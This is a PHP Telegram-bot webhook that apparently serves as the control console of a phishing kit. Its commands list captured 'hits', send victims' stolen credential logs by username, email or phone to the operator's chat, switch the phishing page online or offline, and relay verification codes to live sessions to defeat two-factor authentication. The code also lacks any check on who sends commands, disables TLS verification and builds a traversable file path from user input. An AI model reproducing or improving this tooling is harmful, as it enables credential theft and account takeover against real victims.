<?php



if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $directory = 'commands/';
    $directory_logs = 'logs/';
    $directory_codes = 'codes/';

    $data = file_get_contents("php://input");
    $update = json_decode($data, true);

    require_once(__DIR__ . '/../includes/php/config.php');

    function bot_reply($method, $fields) {
        global $config;
        $api = 'https://api.telegram.org/bot';
        $url = $api . $config['bot_token'] . '/' . $method;

        $ch = curl_init($url);

        if (isset($fields['document']) && is_a($fields['document'], 'CURLFile')) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: multipart/form-data"]);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
        } else {
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields));
        }

        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_POST           => 1,
            CURLOPT_SSL_VERIFYPEER => false,
        ]);

        $response = curl_exec($ch);
        curl_close($ch);

        return json_decode($response, true);
    }

    if (isset($update['message']['entities']) && $update['message']['entities'][0]['type'] == 'bot_command') {
        $command_text = $update['message']['text'];
        $parts = explode(' ', $command_text, 3);
        $command = $parts[0];

        $available_commands = [
            "/status - Check page status",
            "/set_status online | offline - Set a page status",
            "/panel - Check panel status",
            "/set_panel live | static - Set a panel mode",
            '/hits - Get a list of all hits',
            '/download VALUE - Download file log by username/email/phone',
            '/verify_code VALUE - Send a verify code (as a reply to a message)',
            '/logout - Disconnect the bot',
            '/help - List all available commands'
        ];

        function send_available_commands($chat_id, $message_id) {
            global $available_commands;
            $commands_text = "<blockquote><b>🛂 Available Commands</b></blockquote>\n" . implode("\n", $available_commands);
            bot_reply('sendMessage', [
                'chat_id' => $chat_id,
                'text' => $commands_text,
                'reply_to_message_id' => $message_id,
                'parse_mode' => 'html'
            ]);
        }

        switch ($command) {
            case '/status':
                if (isset($config['status'])) {
                    $status = $config['status'];
            
                    $statusMessage = ($status === 'online')
                        ? '<blockquote><b>🟢 Online</b></blockquote>'
                        : '<blockquote><b>🔴 Offline</b></blockquote>';
                } else {
                    $statusMessage = '<blockquote><b>❌ ERROR</b></blockquote> Status not found';
                }
            
                bot_reply('sendMessage', [
                    'chat_id' => $update['message']['chat']['id'],
                    'text' => $statusMessage,
                    'parse_mode' => 'html',
                    'reply_to_message_id' => $update['message']['message_id'],
                ]);
                break;
            case '/panel':
                if (isset($config['panel'])) {
                    $panel = $config['panel'];
            
                    $panelMessage = ($panel === 'live')
                        ? '<blockquote><b>🟢 Live</b></blockquote>'
                        : '<blockquote><b>🔴 Static</b></blockquote>';
                } else {
                    $panelMessage = "<blockquote><b>❌ ERROR</b></blockquote> Panel not found";
                }
            
                bot_reply('sendMessage', [
                    'chat_id' => $update['message']['chat']['id'],
                    'text' => $panelMessage,
                    'parse_mode' => 'html',
                    'reply_to_message_id' => $update['message']['message_id'],
                ]);
                break;
            case '/set_status':
                $messageParts = explode(' ', $update['message']['text'], 2);
                $newStatus = isset($messageParts[1]) ? strtolower(trim($messageParts[1])) : null;
            
                if ($newStatus === 'online' || $newStatus === 'offline') {
                    $config['status'] = $newStatus;
            
                    $configFilePath = __DIR__ . '/../config.json';
                    if (file_put_contents($configFilePath, json_encode($config, JSON_PRETTY_PRINT))) {
                        $responseMessage = "<blockquote><b>✅ SUCCESS</b></blockquote> Status updated to: $newStatus";
                    } else {
                        $responseMessage = "<blockquote><b>❌ ERROR</b></blockquote> Failed to update the status";
                    }
                } else {
                    $responseMessage = "<blockquote><b>❌ ERROR</b></blockquote> Invalid command. Use 'online' or 'offline'.";
                }
            
                bot_reply('sendMessage', [
                    'chat_id' => $update['message']['chat']['id'],
                    'text' => $responseMessage,
                    'parse_mode' => 'html',
                    'reply_to_message_id' => $update['message']['message_id'],
                ]);
                break;
            case '/set_panel':
                $messageParts = explode(' ', $update['message']['text'], 2);
                $newPanel = isset($messageParts[1]) ? strtolower(trim($messageParts[1])) : null;
            
                if ($newPanel === 'live' || $newPanel === 'static') {
                    $config['panel'] = $newPanel;
            
                    $configFilePath = __DIR__ . '/../config.json';
                    if (file_put_contents($configFilePath, json_encode($config, JSON_PRETTY_PRINT))) {
                        $responseMessage = "<blockquote><b>✅ SUCCESS</b></blockquote> Panel updated to: $newPanel";
                    } else {
                        $responseMessage = "<blockquote><b>❌ ERROR</b></blockquote> Failed to update the panel";
                    }
                } else {
                    $responseMessage = "<blockquote><b>❌ ERROR</b></blockquote> Invalid command. Use 'live' or 'static'.";
                }
            
                bot_reply('sendMessage', [
                    'chat_id' => $update['message']['chat']['id'],
                    'text' => $responseMessage,
                    'parse_mode' => 'html',
                    'reply_to_message_id' => $update['message']['message_id'],
                ]);
                break;
                    
            case '/logout':
                $cfgFilePath = __DIR__ . '/../config.json';
            
                if (file_exists($cfgFilePath)) {
                    if (unlink($cfgFilePath)) {
                        $responseMessage = '<blockquote><b>✅ SUCCESS</b></blockquote>Logged out successfully.';
                    } else {
                        $responseMessage = '<blockquote><b>❌ ERROR</b></blockquote>Logout failed.';
                    }
                } else {
                    $responseMessage = '<blockquote><b>❌ ERROR</b></blockquote>Logout failed. Configuration file does not exist.';
                }
            
                // Send the response to the user
                bot_reply('sendMessage', [
                    'chat_id' => $update['message']['chat']['id'],
                    'text' => $responseMessage,
                    'parse_mode' => 'html',
                    'reply_to_message_id' => $update['message']['message_id'],
                ]);
                break;
            case '/verify_code':
                if (count($parts) === 2 && isset($update['message']['reply_to_message'])) {
                    // Get the request ID from the command
                    $value = $parts[1];
            
                    // Use the replied-to message ID as the filename
                    $filename = $update['message']['reply_to_message']['message_id'];
            
                    // Create directory if it doesn't exist
                    if (!file_exists($directory_codes)) {
                        mkdir($directory_codes, 0777, true);
                    }
            
                    // Define the file path
                    $filePath = $directory_codes . $filename . '.txt';
                    
                    // Attempt to open the file for writing
                    $file = fopen($filePath, 'w');
                    
                    if ($file !== false) {
                        // Write the value to the file
                        if (fwrite($file, $value) !== false) {
                            bot_reply('sendMessage', [
                                'chat_id' => $update['message']['chat']['id'],
                                'text' => "<blockquote><b>✅ SUCCESS</b></blockquote>",
                                'reply_to_message_id' => $update['message']['message_id'],
                                'parse_mode' => 'html',
                            ]);
                        } else {
                            bot_reply('sendMessage', [
                                'chat_id' => $update['message']['chat']['id'],
                                'text' => "<blockquote><b>❌ ERROR</b></blockquote> Failed to save the verification value.",
                                'reply_to_message_id' => $update['message']['message_id'],
                                'parse_mode' => 'html'
                            ]);
                        }
                        fclose($file);
                    } else {
                        bot_reply('sendMessage', [
                            'chat_id' => $update['message']['chat']['id'],
                            'text' => "<blockquote><b>❌ ERROR</b></blockquote> Failed to open the file for writing.",
                            'reply_to_message_id' => $update['message']['message_id'],
                            'parse_mode' => 'html'
                        ]);
                    }
                } else {
                    // Error if incorrect format or not a reply to a message
                    bot_reply('sendMessage', [
                        'chat_id' => $update['message']['chat']['id'],
                        'text' => "<blockquote><b>❌ ERROR</b></blockquote> Incorrect command format or not a reply to a message. Use: /verify VALUE (as a reply to a message).",
                        'reply_to_message_id' => $update['message']['message_id'],
                        'parse_mode' => 'html'
                    ]);
                }
                break;
                
            case '/download':
                if (count($parts) === 2) { // Ensure the command has one parameter
                    $filename = trim($parts[1]);
                    $filePath = $directory_logs . $filename . '.txt'; // Append .txt if not provided
            
                    // Check if the file exists
                    if (file_exists($filePath)) {
                        $realFilePath = realpath($filePath);
            
                        // Debugging: Check if the real file path is correct
                        if (!$realFilePath) {
                            bot_reply('sendMessage', [
                                'chat_id' => $update['message']['chat']['id'],
                                'text' => "<blockquote><b>❌ ERROR</b></blockquote> Failed to resolve real path for file: $filePath",
                                'reply_to_message_id' => $update['message']['message_id'], // Reply to command message
                                'parse_mode' => 'html'
                            ]);
                            break;
                        }
            
                        // Create CURLFile object
                        $document = new CURLFile($realFilePath);
            
                        // Prepare POST fields with the document
                        $fields = [
                            'chat_id' => $update['message']['chat']['id'],
                            'document' => $document,
                            'reply_to_message_id' => $update['message']['message_id'], // Reply to command message
                        ];
            
                        // Send the document using the Telegram API
                        $ch = curl_init("https://api.telegram.org/bot" . $config['bot_token'] . "/sendDocument");
            
                        curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: multipart/form-data"]);
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        curl_setopt($ch, CURLOPT_POST, 1);
                        curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
                        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            
                        $response = curl_exec($ch);
                        curl_close($ch);
            
                        // Check if the response is successful
                        $response = json_decode($response, true);
                        if (isset($response['ok']) && $response['ok']) {
                            echo "File sent";
                        } else {
                            bot_reply('sendMessage', [
                                'chat_id' => $update['message']['chat']['id'],
                                'text' => "<blockquote><b>❌ ERROR</b></blockquote> Failed to send file. Telegram API error: " . json_encode($response),
                                'reply_to_message_id' => $update['message']['message_id'], // Reply to command message
                                'parse_mode' => 'html'
                            ]);
                        }
                    } else {
                        bot_reply('sendMessage', [
                            'chat_id' => $update['message']['chat']['id'],
                            'text' => "<blockquote><b>❌ ERROR</b></blockquote> No hit found for the username: $filename",
                            'reply_to_message_id' => $update['message']['message_id'], // Reply to command message
                            'parse_mode' => 'html'
                        ]);
                    }
                } else {
                    bot_reply('sendMessage', [
                        'chat_id' => $update['message']['chat']['id'],
                        'text' => "<blockquote><b>❌ ERROR</b></blockquote>Incorrect command format. Use: /download VALUE - Download file log by username/email/phone",
                        'reply_to_message_id' => $update['message']['message_id'], // Reply to command message
                        'parse_mode' => 'html'
                    ]);
                }
                break;
                     
            case '/hits':
                // Scan the logs directory for .txt files
                $files = array_filter(scandir($directory_logs), function($file) use ($directory_logs) {
                    return is_file($directory_logs . $file) && pathinfo($file, PATHINFO_EXTENSION) === 'txt';
                });
            
                // Check if there are any files found
                if (empty($files)) {
                    bot_reply('sendMessage', [
                        'chat_id' => $update['message']['chat']['id'],
                        'text' => "No hits found.",
                        'reply_to_message_id' => $update['message']['message_id'],
                        'parse_mode' => 'html'
                    ]);
                } else {
                    // Prepare a list of emails (filenames without extension)
                    $emails = array_map(function($file) {
                        return '- ' . basename($file, '.txt');
                    }, $files);
            
                    // Get the count of emails
                    $emailCount = count($emails);
            
                    // Create a formatted string with email list, using <pre> for easy copying
                    $emailList = "<blockquote> <b>🚀 Hits [$emailCount]</b> </blockquote>\n" . implode("\n", $emails);
            
                    // Send the email list and count to the user with <pre> formatting
                    bot_reply('sendMessage', [
                        'chat_id' => $update['message']['chat']['id'],
                        'text' => $emailList,
                        'parse_mode' => 'html',  // Enable HTML formatting to render <pre> tags
                        'reply_to_message_id' => $update['message']['message_id'],
                    ]);
                }
                break;  
            default:
                // Show available commands when an unknown command is issued
                send_available_commands($update['message']['chat']['id'], $update['message']['message_id']);
                break;
        }
    } elseif (isset($update['callback_query'])) {
        $callback_data = explode(' ', $update['callback_query']['data']);
        $request_id = $callback_data[0];
        $bot_command = $callback_data[1];

        if (!file_exists($directory)) {
            mkdir($directory, 0777, true);
        }

        $filePath = $directory . $request_id . '.txt';
        $file = fopen($filePath, 'w');

        if ($file !== false) {
            if (fwrite($file, $bot_command) !== false) {
                // bot_reply('sendMessage', [
                //     'chat_id' => $update['callback_query']['message']['chat']['id'],
                //     'text' => "Text file '$request_id.txt' created successfully with content '$bot_command'.",
                // ]);
            } else {
                bot_reply('sendMessage', [
                    'chat_id' => $update['callback_query']['message']['chat']['id'],
                    'text' => "<blockquote><b>❌ ERROR</b></blockquote> Failed to write content to text file.",
                    'parse_mode' => 'html'
                ]);
            }

            fclose($file);
        } else {
            bot_reply('sendMessage', [
                'chat_id' => $update['callback_query']['message']['chat']['id'],
                'text' => "<blockquote><b>❌ ERROR</b></blockquote> Failed to open text file for writing.",
                'parse_mode' => 'html'
            ]);
        }
    }
}

?>
